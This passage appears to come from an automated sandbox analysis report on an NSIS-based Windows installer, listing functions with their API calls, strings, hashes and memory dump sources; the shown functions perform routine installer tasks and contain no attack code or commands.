                                      • Instruction ID: 124ce2dc19c04b2723b3ee2bfd57496e8178ec0f66411d0265dc8e2868322ed2
                                      • Opcode Fuzzy Hash: 783531bee77386b6c5f7799fe16efcc6e6d2b48535e64221b1f7caff5671a898
                                      • Instruction Fuzzy Hash: B121B7B09083456FE7106F749D09B2B7EACEB8A305F00447EF681B62D2C77C59058B6B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402E84 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 948 402e84-402e93 949 402e95 948->949 950 402e9c-402ea1 948->950 949->950 951 402eb1-402ef1 call 403072 GetTickCount 950->951 952 402ea3-402eac call 4030a4 950->952 958 402ef7 951->958 959 403068 951->959 952->951 960 402efc-402f04 958->960 961 40306b-40306f 959->961 962 402f06 960->962 963 402f09-402f21 call 403072 960->963 962->963 967 402f27-402f47 call 405f82 963->967 970 402ff9-402ffb 967->970 971 402f4d-402f64 GetTickCount 967->971 972 403062-403063 970->972 973 402f66-402f6e 971->973 974 402fa9-402fad 971->974 972->961 977 402f70-402f74 973->977 978 402f76-402fa6 MulDiv wsprintfA call 404e84 973->978 975 402fee-402ff1 974->975 976 402faf-402fb2 974->976 975->960 981 402ff7 975->981 979 402fd4-402fdf 976->979 980 402fb4-402fc8 WriteFile 976->980 977->974 977->978 978->974 985 402fe2-402fe6 979->985 983 402fca-402fcd 980->983 984 402ffd-402fff 980->984 981->959 983->984 987 402fcf-402fd2 983->987 984->972 985->967 988 402fec 985->988 987->985 988->959
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                      • GetTickCount.KERNEL32 ref: 00402F55
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00008000), ref: 00402F82
                                      • wsprintfA.USER32 ref: 00402F92
                                      • WriteFile.KERNEL32(?,?,?,7FFFFFFF,00000000), ref: 00402FC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%$@0
                                      • API String ID: 4209647438-86420950
                                      • Opcode ID: 999cfab09825ec686d516b9a40fe547eeb8bd05469905d0b0f7633e1135354fd
                                      • Instruction ID: 64f2759147e90b76427b42c30fbf34f55c7ad126d9beac386cd9b4cb986d71c7
                                      • Opcode Fuzzy Hash: 999cfab09825ec686d516b9a40fe547eeb8bd05469905d0b0f7633e1135354fd
                                      • Instruction Fuzzy Hash: A4417E7190020AEBCF10DFA9DA48A9E7BB8FB04355F14413BF901F62D4D7789A50DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403EEE Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                      • GetSysColor.USER32(00000000), ref: 00403F27
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                      • SetBkMode.GDI32(?,?), ref: 00403F3F
                                      • GetSysColor.USER32(?), ref: 00403F52
                                      • SetBkColor.GDI32(?,?), ref: 00403F62
                                      • DeleteObject.GDI32(?), ref: 00403F7C
                                      • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402CC1 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 138memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402DE4
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402E4A
                                        • Part of subcall function 00402BCF: DestroyWindow.USER32(?,00000000,00402DAF,00000001), ref: 00402BE2
                                      Strings
                                      • Inst, xrefs: 00402D18
                                      • Null, xrefs: 00402D2A
                                      • soft, xrefs: 00402D21
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: AllocDestroyFileGlobalPointerWindow
                                      • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 1580554587-639894862
                                      • Opcode ID: 8c6f0ba6a9b99bef2e223335ce12acd5a5288f385b5620c3a51d65f503cbdf54
                                      • Instruction ID: 3f971f39210b7e6cbde4b42bc9c0850d6f2177758484559a6030f38e5231e302
                                      • Opcode Fuzzy Hash: 8c6f0ba6a9b99bef2e223335ce12acd5a5288f385b5620c3a51d65f503cbdf54
                                      • Instruction Fuzzy Hash: 8841A4319402159BDF209F65DA89BAA7BA4EF44354F14403BEA04B62D1C7BC9E818BAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040268D Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                      • GlobalFree.KERNEL32(?), ref: 00402736
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                      • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      • Opcode ID: 24339d99f87c6d6ba69fc8207295b24e7ba760fe95e7986aeaf2365a98965083
                                      • Instruction ID: 94283e328d35fee59e2da4f8035aa06736476ebf885dd15e4876c46effbb42d0
                                      • Opcode Fuzzy Hash: 24339d99f87c6d6ba69fc8207295b24e7ba760fe95e7986aeaf2365a98965083
                                      • Instruction Fuzzy Hash: E4319171C00128BBCF216FA5DD89DAE7E79EF05364F20423AF520762E1C7791D408BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E84 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                      • lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                      • lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                      • SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: 6d23eeeeadc8c975830744756af2e0c6f2d7ce04b7bca1b24e7dcfc844a15c14
                                      • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                      • Opcode Fuzzy Hash: 6d23eeeeadc8c975830744756af2e0c6f2d7ce04b7bca1b24e7dcfc844a15c14
                                      • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040474F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476A
                                      • GetMessagePos.USER32 ref: 00404772
                                      • ScreenToClient.USER32(?,?), ref: 0040478C
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040479E
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction ID: 6bd71cb3d479751b3b69d93d67c88433f783f46e4abb255f82c81c082e4bdd88
                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction Fuzzy Hash: C5014075D00218BADB01DBA4DC45FFEBBBCAB55711F10412BBB10B71C0C7B865018BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402B92
                                      • wsprintfA.USER32 ref: 00402BA2
                                      • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B9C
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                      • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405DE2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E3A
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                      • CharNextA.USER32(?,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E4C
                                      • CharPrevA.USER32(?,?,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E5C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: d928069b7c755bad4a389a515b6181ca2d01bb1fc6f8e262afaf253ea7149d91
                                      • Instruction ID: a557d67b3617775de9dfc0e1e9fcc5985f61690f1b3cb59da45a53f3e3fbe4e1
                                      • Opcode Fuzzy Hash: d928069b7c755bad4a389a515b6181ca2d01bb1fc6f8e262afaf253ea7149d91
                                      • Instruction Fuzzy Hash: 1B11E771804B9129EB3217248C44B77AF98CB9B7A0F18047BE5C5723C2C67C5E828EED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,00409B98,007A8800,00000000,00000000,00000031), ref: 0040177E
                                      • CompareFileTime.KERNEL32(-00000014,?,00409B98,00409B98,00000000,00000000,00409B98,007A8800,00000000,00000000,00000031), ref: 004017A8
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID:
                                      • API String ID: 1941528284-0
                                      • Opcode ID: 643f2cdd29aac1b2aea48babbf9826ec4044719e9cd48a75cc6692d3d0005c94
                                      • Instruction ID: df8d039fdd937f1c478db27dfce12e75bce6feb5164cf919340bcacede668491
                                      • Opcode Fuzzy Hash: 643f2cdd29aac1b2aea48babbf9826ec4044719e9cd48a75cc6692d3d0005c94
                                      • Instruction Fuzzy Hash: F241B771900615BACB10BBA5CC46DAF7979DF42368F20423BF525F10E2DA3C5A419A6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402A47 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction ID: 1ad4598d9375e79b5c4158f8ae6fede31b6a0d7771ae0489b8e1e2a10aea7df0
                                      • Opcode Fuzzy Hash: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction Fuzzy Hash: 72116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004056BD Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,00000000,?,?,004015C2,00000000,000000F0), ref: 004056CB
                                      • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056D0
                                      • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: :$\
                                      • API String ID: 3213498283-1166558509
                                      • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                      • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                      • Opcode Fuzzy Hash: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00401D29
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID:
                                      • API String ID: 3808545654-0
                                      • Opcode ID: d50846cf01dc4d21c027121a250a91c6e779b9c02126d39bd440f749e4007b39
                                      • Instruction ID: 4f22f7d967d41569425e1cc72a43e48c322de2a0bc5ea7779ffcdbaac11077e3
                                      • Opcode Fuzzy Hash: d50846cf01dc4d21c027121a250a91c6e779b9c02126d39bd440f749e4007b39
                                      • Instruction Fuzzy Hash: 760162B1958341AFE7015BB0AE1ABAF7F74A725705F100439F145BA2E2C67C14158B2B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040466D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(0079ECF8,0079ECF8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040458D,000000DF,0000040F,00000400,00000000), ref: 004046FB
                                      • wsprintfA.USER32 ref: 00404703
                                      • SetDlgItemTextA.USER32(?,0079ECF8), ref: 00404716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: de6b24ac2de06aa5a6c00b34d189335991a4621482d9b42b83f82e23e4af78ce
                                      • Instruction ID: 808364b1aeea65b13bf83ed040d55ad759ad6ec36480b824a7a4bb04bc91d3c3
                                      • Opcode Fuzzy Hash: de6b24ac2de06aa5a6c00b34d189335991a4621482d9b42b83f82e23e4af78ce
                                      • Instruction Fuzzy Hash: 8B1108736002243BDB0065699C06EEF329DDBC3375F14023BFA29F61D1E9799C5182E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                      • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
